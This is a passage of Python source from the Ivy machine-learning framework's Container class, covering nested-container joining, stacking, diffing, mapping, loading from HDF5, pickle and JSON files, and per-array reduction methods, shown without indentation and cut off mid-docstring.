self._print_line_spacing = print_line_spacing
self._container_combine_method = container_combine_method
self._types_to_iteratively_nest = _ivy.default(lambda: tuple(types_to_iteratively_nest), (), True)
if _ivy.exists(self._queues):
if isinstance(self._container_combine_method, str):
self._container_combine_method =\
{'list_join': self.list_join,
'concat': lambda conts: self.concat(conts, 0)}[self._container_combine_method]
self._loaded_containers_from_queues = dict()
self._queue_load_sizes_cum = _np.cumsum(queue_load_sizes)
self._queue_timeout = _ivy.default(queue_timeout, _ivy.queue_timeout())
self._local_ivy = ivyh
self._keyword_color_dict = _ivy.default(keyword_color_dict, {})
self._rebuild_child_containers = rebuild_child_containers
self._config = dict(
print_limit=print_limit, print_indent=print_indent, print_line_spacing=print_line_spacing, ivyh=ivyh,
keyword_color_dict=keyword_color_dict, rebuild_child_containers=rebuild_child_containers,
types_to_iteratively_nest=types_to_iteratively_nest)
if dict_in is None:
if kwargs:
dict_in = dict(**kwargs)
else:
dict_in = dict()
elif kwargs:
raise Exception('dict_in and **kwargs cannot both be specified for ivy.Container constructor,'
'please specify one or the other, not both.')
if isinstance(dict_in, dict):
dict_in = dict_in
elif isinstance(dict_in, tuple(self._types_to_iteratively_nest)):
dict_in = dict(zip(['it_{}'.format(str(i).zfill(len(str(len(dict_in)))))
for i in range(len(dict_in))], dict_in))
else:
raise Exception('invalid input {}'.format(dict_in))
for key, value in sorted(dict_in.items()):
d = isinstance(value, tuple(self._types_to_iteratively_nest))
if (isinstance(value, dict) and (not isinstance(value, Container) or rebuild_child_containers)) or \
isinstance(value, tuple(self._types_to_iteratively_nest)):
self[key] = Container(value, **self._config)
else:
self[key] = value
# Class Methods #
# --------------#
@staticmethod
def list_join(containers, config=None):
"""
Join containers of lists together along the specified dimension.
:param containers: containers to list join
:type containers: sequence of Container objects
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: List joined containers, with each entry being a list of arrays
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
new_list = list()
for container in containers:
new_list.append(container[key])
return_dict[key] = Container.list_join(new_list, config)
return Container(return_dict, **config)
else:
return [item for sublist in containers for item in sublist]
@staticmethod
def list_stack(containers, dim, config=None):
"""
List stack containers together along the specified dimension.
:param containers: containers to list stack
:type containers: sequence of Container objects
:param dim: dimension along which to list stack
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Stacked containers, with each entry being a list of arrays
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.list_stack([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
return containers
@staticmethod
def _concat_unify(containers, dev_str, axis=0):
return Container.concat([cont.to_dev(dev_str) for cont in containers.values()], axis)
@staticmethod
def _sum_unify(containers, dev_str, _=None, _1=None):
return sum([cont.to_dev(dev_str) for cont in containers.values()])
@staticmethod
def _mean_unify(containers, dev_str, _=None, _1=None):
return Container._sum_unify(containers, dev_str) / len(containers)
@staticmethod
def unify(containers, dev_str, mode, axis=0):
"""
Unify a list of containers, on arbitrary devices, to a single container on the specified device.
:param containers: containers to unify
:type containers: sequence of Container objects
:param dev_str: The device to unify the containers to.
:type dev_str: str
:param mode: The mode by which to unify, must be one of [ concat | mean | sum ]
:type mode: str
:param axis: The axis along which to concattenate the container, if concat mode is set. Default is 0.
:type axis: int, optional
:return: Unified container
"""
return {'concat': Container._concat_unify,
'sum': Container._sum_unify,
'mean': Container._mean_unify}[mode](containers, dev_str, axis)
@staticmethod
def concat(containers, dim, config=None):
"""
Concatenate containers together along the specified dimension.
:param containers: containers to concatenate
:type containers: sequence of Container objects
:param dim: dimension along which to concatenate
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Concatenated containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.concat([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
# noinspection PyProtectedMember
ivyh = _ivy.default(config['ivyh'], _ivy)
# noinspection PyBroadException
try:
if len(containers[0].shape) == 0:
return ivyh.concatenate([ivyh.reshape(item, [1] * (dim + 1)) for item in containers], dim)
else:
return ivyh.concatenate(containers, dim)
except Exception as e:
raise Exception(str(e) + '\nContainer concat operation only valid for containers of arrays')
@staticmethod
def stack(containers, dim, config=None):
"""
Stack containers together along the specified dimension.
:param containers: containers to stack
:type containers: sequence of Container objects
:param dim: dimension along which to stack
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Stacked containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.stack([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
# noinspection PyProtectedMember
ivyh = _ivy.default(config['ivyh'], _ivy)
# noinspection PyBroadException
try:
if len(containers[0].shape) == 0:
return ivyh.stack([ivyh.reshape(item, [1] * (dim + 1)) for item in containers], dim, config)
else:
return ivyh.stack(containers, dim)
except Exception as e:
raise Exception(str(e) + '\nContainer stack operation only valid for containers of arrays')
@staticmethod
def combine(*containers, config=None):
"""
Combine keys and values in a sequence of containers, with priority given to the right-most container in the case
of duplicates.
:param containers: containers to compare
:type containers: sequence of Container objects
:param config: The configuration for the containers. Default is the same as container_rightmost.
:type config: dict, optional
:return: Combined containers
"""
# if inputs are not dicts, then simply return the right-most value
container_rightmost = containers[-1]
if not isinstance(container_rightmost, dict):
return container_rightmost
if not _ivy.exists(config):
config = container_rightmost.config if isinstance(container_rightmost, Container) else {}
# return if len==1
if len(containers) == 1:
return container_rightmost
# otherwise, check that the keys are aligned between each container, and apply this method recursively
return_dict = dict()
all_Keys = set([item for sublist in [list(cont.keys()) for cont in containers] for item in sublist])
for key in all_Keys:
keys_present = [key in cont for cont in containers]
return_dict[key] =\
_ivy.Container.combine(*[cont[key] for cont, kp in zip(containers, keys_present) if kp], config=config)
return _ivy.Container(return_dict, **config)
@staticmethod
def diff(*containers, mode='all', diff_keys='diff', detect_key_diffs=True, config=None):
"""
Compare keys and values in a sequence of containers, returning the single shared values where they are the same,
and new nested sub-dicts with all values where they are different.
:param containers: containers to compare
:type containers: sequence of Container objects
:param mode: The mode of the diff operation, returning either all keys and values,
only those that are consist across the containers, or only the differences. Default is all.
:type mode: str, optional
:param diff_keys: The key/keys to add to the returned container when differences are found. Default is "diff".
:type diff_keys: str or list of strs, optional
:param detect_key_diffs: Whether to treat different keys as detected differences.
If not, the keys among the input containers are simply combined without flagging
differences. Default is True.
:type detect_key_diffs: bool, optional
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Compared containers
"""
if mode not in ['all', 'same_only', 'diff_only']:
raise Exception('mode must be one of [ "all" | "same_only" | "diff_only" ], but found {}'.format(mode))
# if inputs are not dicts, then compare their values to determine the diff dict
num_containers = len(containers)
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if not isinstance(container0, dict):
equal_mat = _ivy.equal(*containers, equality_matrix=True)
if _ivy.reduce_min(_ivy.cast(equal_mat, 'int32')) == 1:
if mode == 'diff_only':
return _ivy.Container(**config)
return container0
elif mode == 'same_only':
return _ivy.Container(**config)
else:
cont_range = range(num_containers)
diff_dict = dict()
cont_dict = dict(zip(cont_range, containers))
idxs_added = list()
for idx in cont_range:
if idx not in idxs_added:
idxs_to_add = _ivy.indices_where(equal_mat[idx])
idxs_to_add_list = sorted(_ivy.to_numpy(idxs_to_add).reshape(-1).tolist())
if isinstance(diff_keys, str):
key = diff_keys + '_' + str(idxs_to_add_list)[1:-1]
elif isinstance(diff_keys, (list, tuple)):
key = diff_keys[idx]
else:
raise Exception('diff_keys must be either a string or list of strings,'
'but found {} of type {}'.format(diff_keys, type(diff_keys)))
diff_dict[key] = cont_dict[idx]
idxs_added += idxs_to_add_list
return _ivy.Container(diff_dict, **config)
# otherwise, check that the keys are aligned between each container, and apply this method recursively
return_dict = dict()
all_Keys = set([item for sublist in [list(cont.keys()) for cont in containers] for item in sublist])
for key in all_Keys:
keys_present = [key in cont for cont in containers]
all_Keys_present = sum(keys_present) == num_containers
if all_Keys_present:
res = _ivy.Container.diff(*[cont[key] for cont in containers],
mode=mode, diff_keys=diff_keys, detect_key_diffs=detect_key_diffs,
config=config)
if not isinstance(res, dict) or res:
return_dict[key] = res
continue
elif sum(keys_present) == 1 and not detect_key_diffs:
return_dict[key] = containers[keys_present.index(True)][key]
continue
diff_dict = dict()
for i, (key_present, cont) in enumerate(zip(keys_present, containers)):
if detect_key_diffs:
if key_present and mode != 'same_only':
if isinstance(diff_keys, str):
diff_dict[diff_keys + '_' + str(i)] = cont[key]
elif isinstance(diff_keys, (list, tuple)):
diff_dict[diff_keys[i]] = cont[key]
else:
raise Exception('diff_keys must be either a string or list of strings,'
'but found {} of type {}'.format(diff_keys, type(diff_keys)))
if diff_dict:
return_dict[key] = diff_dict
return _ivy.Container(return_dict, **config)
@staticmethod
def multi_map(func, containers, key_chains=None, to_apply=True, prune_unapplied=False, key_chain='', config=None):
"""
Apply function to all array values from a collection of identically structured containers.
:param func: Function to apply to each container entry.
:type func: python function
:param containers: containers to map.
:type containers: sequence of Container objects
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied,
otherwise the leftmost container value is used. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Contaienr
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
return_dict = dict()
for key in sorted(container0.keys()):
values = [cont[key] for cont in containers]
value0 = values[0]
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value0, Container):
ret = _ivy.Container.multi_map(
func, values, key_chains, to_apply, prune_unapplied, this_key_chain, config)
if ret:
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value0
continue
return_dict[key] = func(values, this_key_chain)
# noinspection PyProtectedMember
return Container(return_dict, **config)
@staticmethod
def identical_structure(containers, check_types=True, key_chains=None, to_apply=True, key_chain=''):
"""
Returns a single boolean as to whether the input containers have identical key-chains and data types.
:param containers: containers to map.
:type containers: sequence of Container objects
:param check_types: Whether to also check whether the datatypes of the leaf nodes are the same. Default is True.
:type check_types: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: Boolean
"""
keys = set([i for sl in [list(cont.keys()) for cont in containers] for i in sl])
for key in sorted(keys):
if not min([key in cont for cont in containers]):
return False
values = [cont[key] for cont in containers]
value_0 = values[0]
type_0 = type(value_0)
types = [type(val) for val in values]
if not min([type_n is type_0 for type_n in types]):
if isinstance(value_0, Container) or check_types:
return False
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value_0, Container):
ret = _ivy.Container.identical_structure(values, key_chains, to_apply, this_key_chain)
if not ret:
return False
return True
@staticmethod
def from_disk_as_hdf5(h5_obj_or_filepath, slice_obj=slice(None), ivyh=None):
"""
Load container object from disk, as an h5py file, at the specified hdf5 filepath.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:param slice_obj: slice object to slice all h5 elements.
:type slice_obj: slice or sequence of slices
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
container_dict = dict()
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'r')
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
container_dict[key] = Container.from_disk_as_hdf5(value, slice_obj, ivyh)
elif isinstance(value, _h5py.Dataset):
container_dict[key] = _ivy.default(ivyh, _ivy).array(list(value[slice_obj]))
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
return Container(container_dict, ivyh=ivyh)
@staticmethod
def from_disk_as_pickled(pickle_filepath, ivyh=None):
"""
Load container object from disk at the specified pickle filepath.
:param pickle_filepath: Filepath where the container object is saved to disk.
:type pickle_filepath: str
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
if _ivy.wrapped_mode():
return Container(_pickle.load(open(pickle_filepath, 'rb')), ivyh=ivyh).to_ivy()
return Container(_pickle.load(open(pickle_filepath, 'rb')), ivyh=ivyh)
@staticmethod
def from_disk_as_json(json_filepath, ivyh=None):
"""
Load container object from disk at the specified json filepath.
If some objects were not json-able during saving, then they will be loaded as strings.
:param json_filepath: Filepath where the container object is saved to disk.
:type json_filepath: str
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
with open(json_filepath) as json_data_file:
return Container(_json.load(json_data_file), ivyh=ivyh)
@staticmethod
def h5_file_size(h5_obj_or_filepath):
"""
Get file size of h5 file contents.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:return: Size of h5 file contents, and batch size.
"""
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'r')
else:
h5_obj = h5_obj_or_filepath
size = 0
batch_size = 0
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
size_to_add, batch_size = Container.h5_file_size(value)
size += size_to_add
elif isinstance(value, _h5py.Dataset):
value_shape = value.shape
size += _reduce(_mul, value_shape, 1) * value.dtype.itemsize
batch_size = value_shape[0]
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
return size, batch_size
@staticmethod
def shuffle_h5_file(h5_obj_or_filepath, seed_value=0):
"""
Shuffle entries in all datasets of h5 file, such that they are still aligned along axis 0.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:param seed_value: random seed to use for array shuffling
:type seed_value: int
"""
if seed_value is None:
seed_value = _random.randint(0, 1000)
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'a')
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
Container.shuffle_h5_file(value, seed_value)
elif isinstance(value, _h5py.Dataset):
_random.seed(seed_value)
# noinspection PyTypeChecker
_random.shuffle(value)
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
if isinstance(h5_obj, _h5py.File):
h5_obj.close()
@staticmethod
def reduce(containers, reduction, config=None):
"""
Reduce containers.
:param containers: containers to reduce
:type containers: sequence of Container objects
:param reduction: the reduction function
:type reduction: callable with single list input x
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: reduced containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.reduce([container[key] for container in containers], reduction)
return Container(return_dict, **config)
else:
# noinspection PyBroadException
try:
return reduction(containers)
except Exception as e:
raise Exception(str(e) + '\nContainer reduce operation only valid for containers of arrays')
# Private Methods #
# ----------------#
def _get_shape(self):
if not len(self.keys()):
if _ivy.exists(self._queues):
return [self._queue_load_sizes_cum[-1]]
return [0]
sub_shapes =\
[v for k, v in self.map(lambda x, kc: list(x.shape) if self._ivy.is_array(x)
else ([len(x)] if isinstance(x, (list, tuple, _ivy.MultiDev)) else None)).to_iterator() if v]
if not sub_shapes:
return sub_shapes
min_num_dims = min([len(sub_shape) for sub_shape in sub_shapes])
sub_shapes_array = _np.asarray([sub_shape[0:min_num_dims] for sub_shape in sub_shapes])
sub_shapes_array = _np.where(sub_shapes_array == 0, -1, sub_shapes_array)
mask = _np.prod(sub_shapes_array / sub_shapes_array[0:1], 0) == 1
# noinspection PyTypeChecker
return [None if _np.isnan(i) else int(i)
for i in _np.where(mask, sub_shapes_array[0], _np.ones(min_num_dims)*float('nan')).tolist()]
def _get_shapes(self):
return self.map(lambda x, kc: x.shape if hasattr(x, 'shape') else None)
def _get_dev_str(self):
sub_dev_strs =\
[v for k, v in self.map(lambda x, kc: self._ivy.dev_str(x)
if self._ivy.is_array(x) else None).to_iterator() if v]
if len(set(sub_dev_strs)) <= 1:
return sub_dev_strs[0]
return None
def _at_key_chains_input_as_seq(self, key_chains, ignore_key_errors=False):
return_cont = Container(dict(), **self._config)
for kc in key_chains:
val = self.at_key_chain(kc, ignore_key_errors=ignore_key_errors)
if ignore_key_errors and not _ivy.exists(val):
continue
return_cont.set_at_key_chain(kc, val, inplace=True)
return return_cont
def _at_key_chains_input_as_dict(self, key_chains, current_chain='', ignore_key_errors=False):
return_dict = dict()
for k, v in key_chains.items():
if current_chain == '':
new_current_chain = k
else:
new_current_chain = current_chain + '/' + k
if isinstance(v, dict):
return_dict[k] = self._at_key_chains_input_as_dict(v, new_current_chain,
ignore_key_errors=ignore_key_errors)
else:
val = self.at_key_chain(new_current_chain, ignore_key_errors=ignore_key_errors)
if ignore_key_errors and not _ivy.exists(val):
continue
return_dict[k] = val
return Container(return_dict, **self._config)
def _prune_key_chains_input_as_seq(self, key_chains):
return_cont = self.copy()
for kc in key_chains:
return_cont = return_cont.prune_key_chain(kc)
return return_cont
def _prune_key_chains_input_as_dict(self, key_chains, return_cont=None):
if return_cont is None:
return_cont = self.copy()
for k, v in key_chains.items():
if isinstance(v, dict):
ret_cont = self._prune_key_chains_input_as_dict(v, return_cont[k])
if ret_cont.shape[0] == 0:
del return_cont[k]
else:
del return_cont[k]
return return_cont
# Public Methods #
# ---------------#
def set_framework(self, ivyh):
"""
Update the framework to use for the container.
"""
self._ivy = ivyh
self._config['ivyh'] = ivyh
return self
def all_true(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Determine whether all the entries in the container boolean evaluate to True.
:param assert_is_bool: Whether or not to assert each entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Boolean, whether all entries are boolean True.
"""
return bool(_np.prod([v for k, v in self.as_bools(
assert_is_bool, key_chains, to_apply, prune_unapplied).to_iterator()]))
def all_false(self, assert_is_bool=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Determine whether all the entries in the container boolean evaluate to False.
:param assert_is_bool: Whether or not to assert each entry is of type Boolean.
:type assert_is_bool: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Boolean, whether all entries are boolean False.
"""
return not bool(_np.sum([v for k, v in self.as_bools(
assert_is_bool, key_chains, to_apply, prune_unapplied).to_iterator()]))
def reduce_sum(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes sum of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a sum is performed. The default, axis=None, will sum all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a sum is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.reduce_sum(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_prod(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes product of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a product is performed. The default, axis=None, will multiply all of the
elements of the input array. If axis is negative it counts from the last to the first axis. If axis
is a tuple of ints, a multiplication is performed on all of the axes specified in the tuple instead
of a single axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.reduce_prod(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_mean(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes mean of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a mean is performed. The default, axis=None, will mean all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a mean is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.reduce_mean(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_var(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes variance of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a var is performed. The default, axis=None, will var all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a var is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the variance computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_var(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_std(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes standard deviation of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a var is performed. The default, axis=None, will var all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a var is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with the standard deviation computed for all sub-arrays.
"""
return self.map(lambda x, kc: self._ivy.reduce_std(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_min(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes min of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a min is performed. The default, axis=None, will min all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a min is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.reduce_min(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def reduce_max(self, axis=None, keepdims=False, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes max of array elements along a given axis for all sub-arrays of container object.
:param axis: Axis or axes along which a max is performed. The default, axis=None, will max all of the elements
of the input array. If axis is negative it counts from the last to the first axis. If axis is a
tuple of ints, a max is performed on all of the axes specified in the tuple instead of a single
axis or all the axes as before.
:type axis: int or sequence of ints
:param keepdims: If this is set to True, the axes which are reduced are left in the result as dimensions with
size one. With this option, the result will broadcast correctly against the input array.
:type keepdims: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-array dimensions expanded along the axis.
"""
return self.map(lambda x, kc: self._ivy.reduce_max(x, axis, keepdims) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def minimum(self, other, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise minimum between this container and another container or number.
:param other: The other container or number to compute the minimum against.
:type other: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the minimum values computed.
"""
is_container = isinstance(other, Container)
return self.map(lambda x, kc:
self._ivy.minimum(x, other[kc] if is_container else other) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def maximum(self, other, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise maximum between this container and another container or number.
:param other: The other container or number to compute the maximum against.
:type other: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the maximum values computed.
"""
is_container = isinstance(other, Container)
return self.map(lambda x, kc:
self._ivy.maximum(x, other[kc] if is_container else other) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def clip(self, clip_min, clip_max, key_chains=None, to_apply=True, prune_unapplied=False):
"""
Computes the elementwise clipped values between this container and clip_min and clip_max containers or numbers.
:param clip_min: The minimum container or number to clip against.
:type clip_min: Ivy container or number
:param clip_max: The maximum container or number to clip against.
:type clip_max: Ivy container or number
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied. Default is False.
:type prune_unapplied: bool, optional
:return: Container object with all sub-arrays having the clipped values returned.
"""
min_is_container = isinstance(clip_min, Container)
max_is_container = isinstance(clip_max, Container)
return self.map(lambda x, kc:
self._ivy.clip(x, clip_min[kc] if min_is_container else clip_min,
clip_max[kc] if max_is_container else clip_max) if self._ivy.is_array(x) else x,
key_chains, to_apply, prune_unapplied)
def clip_vector_norm(self, max_norm, p, global_norm=False, key_chains=None, to_apply=True,
prune_unapplied=False):
"""
Computes the elementwise clipped values between this container and clip_min and clip_max containers or numbers.
